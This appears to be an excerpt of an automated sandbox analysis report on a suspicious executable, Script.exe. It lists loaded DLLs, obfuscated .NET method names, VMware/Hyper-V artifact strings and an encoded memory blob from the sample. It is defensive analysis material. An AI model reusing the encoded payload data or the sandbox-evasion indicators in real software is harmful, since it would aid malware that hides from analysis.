Source: C:\Users\user\Desktop\Script.exe | Section loaded: wldp.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Script.exe | Section loaded: windows.storage.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Script.exe | Section loaded: wldp.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Script.exe | Section loaded: winhttp.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Script.exe | Section loaded: ondemandconnroutehelper.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Script.exe | Section loaded: webio.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Script.exe | Section loaded: mswsock.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Script.exe | Section loaded: iphlpapi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Script.exe | Section loaded: winnsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Script.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Script.exe | Section loaded: dnsapi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Script.exe | Section loaded: rasadhlp.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Script.exe | Section loaded: fwpuclnt.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Script.exe | Section loaded: schannel.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Script.exe | Section loaded: mskeyprotect.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Script.exe | Section loaded: ntasn1.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Script.exe | Section loaded: ncrypt.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Script.exe | Section loaded: ncryptsslp.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Script.exe | Section loaded: msasn1.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Script.exe | Section loaded: cryptsp.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Script.exe | Section loaded: rsaenh.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Script.exe | Section loaded: cryptbase.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Script.exe | Section loaded: gpapi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Script.exe | Section loaded: dpapi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Script.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Script.exe | Section loaded: uxtheme.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Script.exe | Section loaded: ondemandconnroutehelper.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Script.exe | Section loaded: wbemcomn.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Script.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Script.exe | Section loaded: userenv.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Script.exe | Section loaded: profapi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Script.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Script.exe | Section loaded: ondemandconnroutehelper.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Script.exe | Section loaded: ondemandconnroutehelper.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Script.exe | Section loaded: ondemandconnroutehelper.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Script.exe | Section loaded: ondemandconnroutehelper.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Script.exe | Section loaded: ondemandconnroutehelper.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Script.exe | Section loaded: ondemandconnroutehelper.dll | Jump to behavior |
Source: Script.exe, vCg2VT5p7jXNk50llbq.cs | High entropy of concatenated method names: 'OkE5tnHZaj', 'quL5gsUNKs', 'eLK5c84hpa', 'gXo58eGg5j', 'GW55mMYBwj', 'dbk5nDS4d7', 'YJd5ONDt15', 'tsG5SJZu72', 'FvJ53MSI6H', 'NUD52Skowi' |
Source: Script.exe, vq3eeWeR9wjKffmTlE.cs | High entropy of concatenated method names: 'RmVqL4ujd4', 'nW4lBacjpc', 'IAr5ATjHqU', 'UIx5yCnXZI', 'oQd5WcYeRd', 'qXl50hRD5T', 'oR65zJ81n2', 'jQiB7OERf', 'LicZSc09T', 'a2jGlQURl' |
Source: 0.2.Script.exe.3979550.0.raw.unpack, vCg2VT5p7jXNk50llbq.cs | High entropy of concatenated method names: 'OkE5tnHZaj', 'quL5gsUNKs', 'eLK5c84hpa', 'gXo58eGg5j', 'GW55mMYBwj', 'dbk5nDS4d7', 'YJd5ONDt15', 'tsG5SJZu72', 'FvJ53MSI6H', 'NUD52Skowi' |
Source: 0.2.Script.exe.3979550.0.raw.unpack, vq3eeWeR9wjKffmTlE.cs | High entropy of concatenated method names: 'RmVqL4ujd4', 'nW4lBacjpc', 'IAr5ATjHqU', 'UIx5yCnXZI', 'oQd5WcYeRd', 'qXl50hRD5T', 'oR65zJ81n2', 'jQiB7OERf', 'LicZSc09T', 'a2jGlQURl' |
Source: C:\Users\user\Desktop\Script.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\Script.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\Script.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\Script.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\Script.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\Script.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\Script.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\Script.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\Script.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\Script.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\Script.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\Script.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\Script.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\Script.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\Script.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\Script.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\Script.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\Script.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\Script.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\Script.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\Script.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: Amcache.hve.5.dr | Binary or memory string: VMware |
Source: Amcache.hve.5.dr | Binary or memory string: VMware Virtual USB Mouse |
Source: Amcache.hve.5.dr | Binary or memory string: vmci.syshbin |
Source: Amcache.hve.5.dr | Binary or memory string: VMware, Inc. |
Source: Amcache.hve.5.dr | Binary or memory string: VMware20,1hbin@ |
Source: Amcache.hve.5.dr | Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563 |
Source: Amcache.hve.5.dr | Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000 |
Source: Amcache.hve.5.dr | Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys |
Source: Script.exe, 00000002.00000002.3253212983.000000000162C000.00000004.00000020.00020000.00000000.sdmp, Script.exe, 00000002.00000002.3253340942.0000000001668000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW |
Source: Amcache.hve.5.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000 |
Source: Amcache.hve.5.dr | Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev |
Source: Amcache.hve.5.dr | Binary or memory string: c:/windows/system32/drivers/vmci.sys |
Source: Amcache.hve.5.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000 |
Source: Amcache.hve.5.dr | Binary or memory string: vmci.sys |
Source: Amcache.hve.5.dr | Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0 |
Source: Script.exe, 00000002.00000002.3253427446.00000000016C6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ,"e":1,"d":"HbYc1janKuml4iIL5MOuD7Ddk\/wJqAf0ti0l2bCRTIhQ7GTWN6cq6aHiIgvkw64PsN2T\/AmoB\/T2LSXZsJFMiB22HNY2pyrppeIiC+TDrg+w3ZP8CagH9LYtJdnIkUyIE6mm2DYTIySEWiNHKeL6Z9mus4x7x2CG10AFutH\/Iudpln6zFtVfh4WLTCugjP0v3bL3mSeMB\/TmaCXZ\/JBIiCnedLE2pyrppeIiCwTDrC673J38CbgH9LYnJdmwkUyIHaYc1ja3Kuml4iIL5MOuH7DNk\/wJqgf0sC0l2bCRTIgbthzWNqcq6aWyIgvkx64PsN2T\/AuoR\/G2LTXZsIFMiB22DNY2tyrppeIiC\/TDrg+w3ZP8CagH9AQPJdmMkUyIHbYc1janKuml4iIL5MOuD7Ddk\/wJqAf0tm0l2eiRTIgdthzWNqcq6aXiIgvkw64PsN2T\/AmoB\/S2LSXZsJFMiB22HNY2pyrppeIiC+TDrg+U\/pP8PagH9LYtJdmwkUyIHbYc1janKuml4iIL5MOuD56p9oR9qAf0fyIl2bCBTIgdphzWNqMq6aXiIgvkw64PsN2T\/CmoB5SYX0G4xPBMiDGyHNY2hyrppeQiC+TXrg+w3ZP8CagH9LYtJdnwkUzIM9J9olenKum94iIL5POuD7Dfk\/wJsgf0ti0l2bCRTIgdthzWdqcqKYuQR2eLoK4P6N2T\/AnoB\/S2LyXZsI1MiB22HNY2pyrppeIiC6TDrk2w3ZP8CagH9LYtJdmwkUyIHbYc1janKuml4iIL5MOuD7Ddk\/wJqAf0ti0l2bCRTIgdthzWNqcq6aXiIgvkw64PsN2T\/AmoB\/S2LSXZsJFMiB22HNY2pyrppeIiC+TDrg+w3ZP8CagH9LYtJdmwkUyIHbYc1janKuml4iIL5MOuD7Ddk\/wJqAf0ti0l2bCRTIgdthzWNqcq6aXiIgvkw64PsN2T\/AmoB\/S2LSXZsJFMiB22HNY2pyrppeIiC+TDrg+w3ZP8CagH9LYtJdmwkUyIHbYc1janKuml4iIL5MOuD7Ddk\/wJqAf0ti0l2bCRTIgdthzWNqcq6aXiIgvkw64PsN2T\/AmoB\/S2LSXZsJFMiB22HNY2pyrppeIiC+TDrg+w3ZP8CagH9LYtJdmwkUyIHbYc1janKuml4iIL5MOuD7Ddk\/wJqAf0ti0l2bCRTIgdthzWNqcq6aXiIgvkw64PsN2T\/AmoB\/S2LSXZsJFMiB22HNY2pyrppeIiC+TDrg+w3ZP8CagH9LYtJdmwkUyIHbYc1janKuml4iIL5MOuD7Ddk\/wJqAf0ti0l2bCRTIgdthzWNqcq6aXiIgvkw64PsN2T\/AmoB\/S2LSXZsJFMiB22HNY2pyrppeIiC+TDrg+w3ZP8CagH9LYtJdmwkUyISOVLgLVLImrZxgIK60ZeD7DdogqClTfXtj2u9OCyTJj2pHqwUMFMx6r9pgvkw64P2txsKfZ\/PjLC20\/ZT4R4qx2mmRY5I4XppeJIBhvWgiywzRY8Biye9LYtrB\/gblnAPrYMU\/aormGl4iKCJ0raK7TsZc3JzmHauTKh2bCRTIiedhiwtZsZ6SiUIH4Xk8QNT8jT3wm4jvCSqOWt\/G54rOKjVPU2t3y6LCRy45TDrg8zGZ+q4W8H9Lau4d05UrO8OUkJmhWnOm1+ljf08euND6Aip9hjpfjhjg4lyTVROYHigjgpI+MJ6bUdVi\/gPLtDk92DAxyMJPSm0vJQdnh+d+JJpNc2pypqYep8VL+ebAOwEV8wxWTLOHrh6RV8XYBETuFKXXKDOmLRxjaAqOe2hnpUXAveK8j3OzEcmnF4Tgv\/SpURN3crGyIU0a5jNSfWYTQaKoBvgAJFS4BeRhiVC\/xIHR7AZCudou2UB+5Lpk\/ugsg\/xWTLOHrh6RV8XYBESOVLgLVLOmL5xgbM4OeuD7DdLFQrqBdNHg8lyTlPKjN\/tpUkv9MO7ar9pgvkw64Pv2q5moxFCHDaLCXZM1NOC9y0kZA0wRM0qqfSBKEToUp\/0iTlby3cgWGo09Y01k2IHTtS3rvhfmDhxiqxPTxR8FvK9ZpvzmHauTKh2bCRTIiedx6UtV3VnZ7tlRJpgH5pMyWZjuIlRGvQrt3DwnPBy6LQny4vqK0GpeIiBFMoyIxLlJx44KgH9DXQaqxzGIdhTknjKQ3TDu0utgYDku2huP4jHr3ZIdR3TicqW4dus3eQ96Nf5STS86pgC\/QbPC3OL1RAf\/CyCHat0tomvyZGBVxmlQW1XyDmJ+jd9BtO77A5DhAEE6eFCEjS2lpxDsVbnk8G2bRJ1BZaWdz0GzwlIrDtk+xvzmHauTKh2bCRTIh7NWDLNKensqeX14gfl9oRgR31f3WuU\/Q7bSesRRxAlk1JaPI69sL8ruIiiCDP\/ |